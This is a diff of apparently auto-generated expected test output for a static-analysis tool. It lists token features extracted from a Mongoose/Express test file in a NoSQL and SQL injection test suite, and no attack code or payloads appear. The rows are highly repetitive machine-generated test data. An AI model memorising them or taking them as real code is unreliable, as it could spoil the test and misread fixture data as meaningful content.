autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:36 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:36 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:18:4:24 | require | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:18:4:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:18:4:24 | require | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:18:4:36 | exceptional return of require('mongoose') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:18:4:36 | exceptional return of require('mongoose') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:18:4:36 | exceptional return of require('mongoose') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:18:4:36 | require('mongoose') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:18:4:36 | require('mongoose') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:18:4:36 | require('mongoose') | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:26:4:35 | 'mongoose' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:26:4:35 | 'mongoose' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:26:4:35 | 'mongoose' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:26:4:35 | 'mongoose' | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:26:4:35 | 'mongoose' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:26:4:35 | 'mongoose' | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:1:5:8 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:1:5:8 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:1:5:8 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:1:5:16 | Mongoose.Promise | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:1:5:16 | Mongoose.Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:1:5:16 | Mongoose.Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:1:5:33 | Mongoos ... Promise | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:1:5:33 | Mongoos ... Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:1:5:33 | Mongoos ... Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:10:5:16 | Promise | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:10:5:16 | Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:10:5:16 | Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:20:5:25 | global | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:20:5:25 | global | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:20:5:25 | global | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:20:5:33 | global.Promise | assignedToPropName | Promise | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:20:5:33 | global.Promise | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:20:5:33 | global.Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:20:5:33 | global.Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:27:5:33 | Promise | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:27:5:33 | Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:5:27:5:33 | Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:8 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:8 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:8 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:16 | Mongoose.connect | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:16 | Mongoose.connect | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:16 | Mongoose.connect | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:51 | Mongoos ... able1') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:51 | Mongoos ... able1') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:51 | Mongoos ... able1') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:51 | exceptional return of Mongoos ... able1') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:51 | exceptional return of Mongoos ... able1') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:1:6:51 | exceptional return of Mongoos ... able1') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:10:6:16 | connect | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:10:6:16 | connect | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:10:6:16 | connect | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:18:6:50 | 'mongod ... table1' | CalleeFlexibleAccessPath | Mongoose.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:18:6:50 | 'mongod ... table1' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:18:6:50 | 'mongod ... table1' | calleeImports | mongoose | @@ -2157,6 +11632,45 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:18:6:50 | 'mongod ... table1' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:18:6:50 | 'mongod ... table1' | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:6:18:6:50 | 'mongod ... table1' | receiverName | Mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:7:8:9 | app | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:7:8:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:7:8:9 | app | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:7:8:21 | app | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:7:8:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:7:8:21 | app | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:7:8:21 | app = Express() | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:7:8:21 | app = Express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:7:8:21 | app = Express() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:13:8:19 | Express | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:13:8:19 | Express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:13:8:19 | Express | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:13:8:21 | Express() | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:13:8:21 | Express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:13:8:21 | Express() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:13:8:21 | exceptional return of Express() | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:13:8:21 | exceptional return of Express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:8:13:8:21 | exceptional return of Express() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:3 | app | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:3 | app | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:7 | app.use | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:7 | app.use | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:26 | app.use ... json()) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:26 | app.use ... json()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:26 | app.use ... json()) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:26 | exceptional return of app.use ... json()) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:26 | exceptional return of app.use ... json()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:1:9:26 | exceptional return of app.use ... json()) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:5:9:7 | use | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:5:9:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:5:9:7 | use | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:18 | BodyParser | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:18 | BodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:18 | BodyParser | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:23 | BodyParser.json | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:23 | BodyParser.json | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:23 | BodyParser.json | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:25 | BodyParser.json() | CalleeFlexibleAccessPath | app.use | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:25 | BodyParser.json() | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:25 | BodyParser.json() | calleeImports | express | @@ -2164,6 +11678,37 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:25 | BodyParser.json() | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:25 | BodyParser.json() | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:25 | BodyParser.json() | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:25 | exceptional return of BodyParser.json() | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:25 | exceptional return of BodyParser.json() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:9:9:25 | exceptional return of BodyParser.json() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:20:9:23 | json | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:20:9:23 | json | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:9:20:9:23 | json | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:11:14 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:11:14 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:11:14 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:11:14 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:17:2 | Documen ... ring\\n}) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:17:2 | Documen ... ring\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:17:2 | Documen ... ring\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:17:2 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:17:2 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:7:17:2 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:11:25 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:11:25 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:11:25 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:11:31 | Mongoose.model | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:11:31 | Mongoose.model | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:11:31 | Mongoose.model | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:17:2 | Mongoos ... ring\\n}) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:17:2 | Mongoos ... ring\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:17:2 | Mongoos ... ring\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:17:2 | exceptional return of Mongoos ... ring\\n}) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:17:2 | exceptional return of Mongoos ... ring\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:18:17:2 | exceptional return of Mongoos ... ring\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:27:11:31 | model | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:27:11:31 | model | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:27:11:31 | model | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:33:11:42 | 'Document' | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:33:11:42 | 'Document' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:33:11:42 | 'Document' | calleeImports | mongoose | @@ -2178,6 +11723,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:45:17:1 | {\\n t ... tring\\n} | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:45:17:1 | {\\n t ... tring\\n} | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:11:45:17:1 | {\\n t ... tring\\n} | receiverName | Mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:5:12:9 | title | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:5:12:9 | title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:5:12:9 | title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:5:15:5 | title: ... e\\n } | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:5:15:5 | title: ... e\\n } | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:5:15:5 | title: ... e\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:5:15:5 | title: ... e\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:5:15:5 | title: ... e\\n } | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:5:15:5 | title: ... e\\n } | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:12:15:5 | {\\n ... e\\n } | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:12:15:5 | {\\n ... e\\n } | InputAccessPathFromCallee | 1.title | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:12:15:5 | {\\n ... e\\n } | InputArgumentIndex | 1 | @@ -2186,6 +11740,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:12:15:5 | {\\n ... e\\n } | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:12:15:5 | {\\n ... e\\n } | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:12:12:15:5 | {\\n ... e\\n } | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:9:13:12 | type | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:9:13:12 | type | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:9:13:12 | type | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:9:13:20 | type: String | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:9:13:20 | type: String | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:9:13:20 | type: String | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:9:13:20 | type: String | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:9:13:20 | type: String | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:9:13:20 | type: String | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:15:13:20 | String | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:15:13:20 | String | InputAccessPathFromCallee | 1.title.type | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:15:13:20 | String | InputArgumentIndex | 1 | @@ -2194,6 +11757,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:15:13:20 | String | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:15:13:20 | String | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:13:15:13:20 | String | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:9:14:14 | unique | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:9:14:14 | unique | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:9:14:14 | unique | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:9:14:20 | unique: true | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:9:14:20 | unique: true | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:9:14:20 | unique: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:9:14:20 | unique: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:9:14:20 | unique: true | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:9:14:20 | unique: true | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:17:14:20 | true | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:17:14:20 | true | InputAccessPathFromCallee | 1.title.unique | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:17:14:20 | true | InputArgumentIndex | 1 | @@ -2202,6 +11774,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:17:14:20 | true | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:17:14:20 | true | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:14:17:14:20 | true | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:5:16:8 | type | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:5:16:8 | type | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:5:16:8 | type | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:5:16:16 | type: String | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:5:16:16 | type: String | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:5:16:16 | type: String | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:5:16:16 | type: String | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:5:16:16 | type: String | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:5:16:16 | type: String | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:11:16:16 | String | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:11:16:16 | String | InputAccessPathFromCallee | 1.type | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:11:16:16 | String | InputArgumentIndex | 1 | @@ -2210,6 +11791,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:11:16:16 | String | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:11:16:16 | String | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:16:11:16:16 | String | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:19:3 | app | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:19:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:19:3 | app | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:19:8 | app.post | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:19:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:19:8 | app.post | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:132:2 | app.pos ... / OK\\n}) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:132:2 | app.pos ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:132:2 | app.pos ... / OK\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:132:2 | exceptional return of app.pos ... / OK\\n}) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:132:2 | exceptional return of app.pos ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:1:132:2 | exceptional return of app.pos ... / OK\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:5:19:8 | post | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| 